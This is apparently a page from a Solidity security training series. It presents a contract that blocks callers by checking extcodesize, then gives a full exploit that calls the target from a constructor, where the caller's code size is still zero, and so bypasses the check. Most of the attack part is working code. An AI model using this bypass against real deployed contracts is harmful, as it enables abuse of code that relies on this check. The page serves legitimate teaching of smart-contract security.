Bypass Contract Size

Contracts cannot call the fallback of this contract.

contract NoContract {
    function isContract(address addr) public view returns (bool) {
        uint size;
        assembly {
            size := extcodesize(addr)
        }
        return size > 0;
    }

    modifier noContract() {
        require(!isContract(msg.sender), "no contract allowed");
        _;
    }

    bool public pwned = false;

    fallback() external noContract {
        pwned = true;
    }
}

Set pwned to true. The fallback function in NoContract will be called from your pwn function inside your exploit contract.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

contract Zero {
    constructor(address _target) {
        _target.call("");
    }
}

contract NoContractExploit {
    address public target;

    constructor(address _target) {
        target = _target;
    }

    function pwn() external {
        new Zero(target);
    }
}

PreviousMisaligned Storage NextMulti Token Bank

Last updated 3 years ago

Was this helpful?